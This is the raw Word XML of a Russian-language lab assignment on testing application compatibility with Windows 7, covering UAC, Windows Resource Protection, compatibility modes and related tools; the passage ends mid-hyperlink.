      <w:bookmarkStart w:id="23" w:name="_Toc507788509"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00616342" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00DD6D41" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выявление проблем совместимости программного обеспечения с помощью Администратора совместимости операционной системы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00DD6D41" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совместимость приложений с Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В операционной системе Windows Vista® было произведено немало существенных изменений в части обработки обращений программ к режиму ядра, что сделало эту ОС более безопасной, чем Windows® XP. Однако эти изменения привели к проблемам совместимости приложений, для разрешения которых многие программы требовалось исправить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Модель приложений Windows® 7 основана на той же базовой архитектуре, что и в Windows Vista. Большинство программ, совместимых с одной, совместимы и с другой. Благодаря одному этому внедрение Windows 7 проходит легче, чем переход с Windows XP на Windows Vista. Если в вашем предприятии, как и многих других, за стандарт принята Windows XP, вам, возможно, потребуется перейти на обновленные версии ключевых приложений. Широкая доступность версий, совместимых с Windows Vista, а также проверенные способы обеспечения совместимости сделают эту задачу более легкой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Однако, существует вероятность, что более старые приложения не смогут корректно работать с новыми технологиями обеспечения безопасности ОС Windows 7, например контролем учетных записей (UAC) или защитой ресурсов Windows (WRP).</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В наборе средств </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Microsoft Deployment Toolkit (MDT) 2010</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержится исчерпывающее руководство по обеспечению совместимости приложений, с помощью которого можно установить возможные проблемы совместимости в ОС Windows 7 и устранить их. Подробнее об этом см. </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Руководство для группы обеспечения совместимости приложений</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В этой главе приведены простые процедуры по проверке степени совместимости приложений с Windows 7, а также некоторые из наиболее типичных проблем с совместимостью и ресурсы, которые помогут в их устранении.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="004653C4" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Тестирование совместимости приложений. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</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Тестирование приложения на компьютере с Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Установите на компьютер Windows 7 и войдите в систему от имени администратора.</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 2. Установите тестируемое приложение. Если при установке появится запрос на подтверждение, нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Permit</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(разрешить), чтобы продолжить. Если установка завершилась успешно, переходите к шагу 6.</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Примечание</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Этот шаг необязателен, если для установки приложения используется MSI-файл.</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Внимание!</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Если установщик программы предлагает сразу же запустить ее, откажитесь, поскольку иначе приложение запустится с теми же повышенными правами, что использовались для установки.</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3. Если установка завершается неудачей, и при этом запроса на подтверждение не выдается, щелкните правой кнопкой EXE-файл установщика и выберите команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Run this program as administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (запустить от имени администратора), после чего повторите установку. Если установка завершилась успешно, переходите к шагу 7.</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4. Если происходят ошибки, связанные с версией операционной системы, регистрацией приложения или копированием файлов, щелкните правой кнопкой мыши EXE-файл установщика, выберите пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (совместимость) и укажите режим совместимости </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows XP Professional SP3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Повторите шаг 2. Если приложение не устанавливается, переходите к шагу 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Войдите в систему от имени пользователя, не обладающего административными привилегиями.</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7. Запустите приложение. Если приложение не запускается как нужно или происходят ошибки, включите режим совместимости </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows XP Professional SP3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для EXE-файла приложения, после чего попытайтесь запустить его снова.</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8. Если приложение запускается успешно, проведите полный набор тестов, который вы обычно используете на компьютерах с ОС Windows XP с пакетом обновления 3 (SP3). Если </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>основные тесты функциональности проходят успешно, приложение будет нормально работать в Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. Если приложение не устанавливается, не запускается, перестает отвечать, выдает ошибки или не может пройти какие-либо из основных тестов функциональности, оно может иметь проблемы с совместимостью в ОС Windows 7. Для дальнейшего изучения ситуации обратитесь к другим ресурсам данной главы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если, выполнив эти шаги, вы установили, что приложение работает нормально, можно заключить, что оно совместимо с Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткие теоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Известные проблемы совместимости приложений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассмотрим технологии, изменения и улучшения ОС Windows 7, которые часто вызывают проблемы совместимости приложений. Где это возможно, приведены и вероятные способы их устранения.</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Важно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Все приложения необходимо протестировать на совместимость с Windows 7, чтобы убедиться в их корректной работе под управлением этой ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Улучшения безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ниже приведены улучшения безопасности из состава Windows Vista и Windows 7, которые могут вызывать проблемы совместимости с приложениями, разработанными для более ранних версий Windows.</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Контроль учетных записей</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Эта технология в ОС Windows Vista и Windows 7 позволяет отделить задачи и привилегии обычного пользователя от таковых у администратора. Контроль учетных записей (UAC) повышает защиту компьютера, давая пользователям возможность удобно работать с обычными правами. Они могут выполнять больше задач и испытывать меньше проблем с совместимостью приложений, не обладая при этом административными привилегиями. Это позволяет снизить риски, исходящие от заражения вредоносными программами, неразрешенной установки программ и несанкционированных изменений системы. Одна из самых полезных возможностей UAC – виртуализация отдельных частей реестра и файловой системы в случаях, когда приложения, работающие с низкими полномочиями, пытаются записывать данные в системные расположения. Контроль учетных записей может нарушать работу приложений, которые не совместимы с описанными улучшениями. По этой причине перед развертыванием необходимо тестировать приложения на совместимость с UAC.</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Защита ресурсов Windows.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Впервые появившись в ОС Windows Vista под названием </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Защита файлов Windows</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, технология защиты ресурсов Windows теперь охраняет не только ключевые системные файлы, но и папки, и разделы реестра. Ее задача – обеспечить большую стабильность и безопасность работы операционной системы. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приложения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые пытаются внести изменения в эти охраняемые участки, могут некорректно работать в Windows 7. В таких случаях приложение нужно исправить, чтобы оно работало как задумано. </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Защищенный режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Эта способность обозревателя Windows® Internet Explorer® 7 и более поздних версий позволяет защитить компьютеры с ОС Windows от установки вредоносных программ за счет работы с пониженными привилегиями. Когда обозреватель находится в защищенной режиме, он может взаимодействовать только с отдельными частями файловой системы и реестра. Хотя защищенный режим способствует сохранению целостности компьютеров под управлением Windows, он может препятствовать нормальной работе более старых веб- и интранет-приложений. Такие приложения может потребоваться изменить под работу в более ограниченной среде. По умолчанию в Internet Explorer® 8 защищенный режим не применяется при работе с веб-сайтами из доверенной зоны и зоны интранета.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменения и инновации операционной системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нижеперечисленные изменения и инновации в ОС Windows 7 могут вызывать проблемы совместимости со сторонними приложениями.</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Новые API-интерфейсы.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Программные интерфейсы для приложений (API) представляют компоненты ОС Windows Vista с пакетом обновления 1 (SP1) иначе, чем это было раньше. Такие интерфейсы требуются, например, антивирусным программам и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>брандмауэрам, чтобы они могли обеспечивать надлежащий мониторинг и защиту Windows Vista и Windows 7. Для устранения возможных проблем следует обновить эти приложения до версий, совместимых с Windows Vista SP1.</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64-разрядная Windows 7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 16-разрядные приложения и 32-разрядные драйверы не поддерживаются в 64-разрядной среде Windows. Автоматическое перенаправление при работе с реестром и файловой системой используется только для 32-разрядных приложений. Поэтому любые 64-разрядные приложения должны полностью соответствовать стандартам Windows 7 и Windows Vista.</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Версии операционной системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Многие старые приложения проверяют версию Windows. Если проверка показала, что версия не соответствует ожидаемой, они могут перестать работать. Во многих случаях эта проблема разрешается простым указанием для приложения режима совместимости с одной из предыдущих версий Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Большинство проблем совместимости, связанных с требованиями к версии операционной системы, решаются с помощью новых средств, встроенных в Windows 7. Такие компоненты, как помощник по совместимости программ, обычно способны справиться с ними автоматически. Подробнее о помощнике по совместимости программ и других средствах рассказано далее в этой главе.</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Дополнительную информацию об этих изменениях и улучшениях в ОС Windows 7 см. в разделе MSDN </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 7 and Windows Server 2008 R2 Application Quality Cookbook</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Там также приведены способы возможные обнаружения и устранения большинства таких неполадок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Средства и ресурсы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В этом разделе приведен краткий обзор некоторых компонентов и технологий Windows 7, предназначенных для решения проблем с совместимостью приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Помощник по совместимости программ</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Автоматически назначает подходящий режим совместимости приложению, разработанному для предыдущей версии Windows. Когда Windows 7 обнаруживает программу, которой необходим режим совместимости с Windows 2000, Windows XP Professional с пакетом обновления 3 (SP3) или более поздними версиями, она автоматически производит нужные изменения, чтобы программа в дальнейшем корректно работала в Windows 7. Подробнее см. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00617AC0">
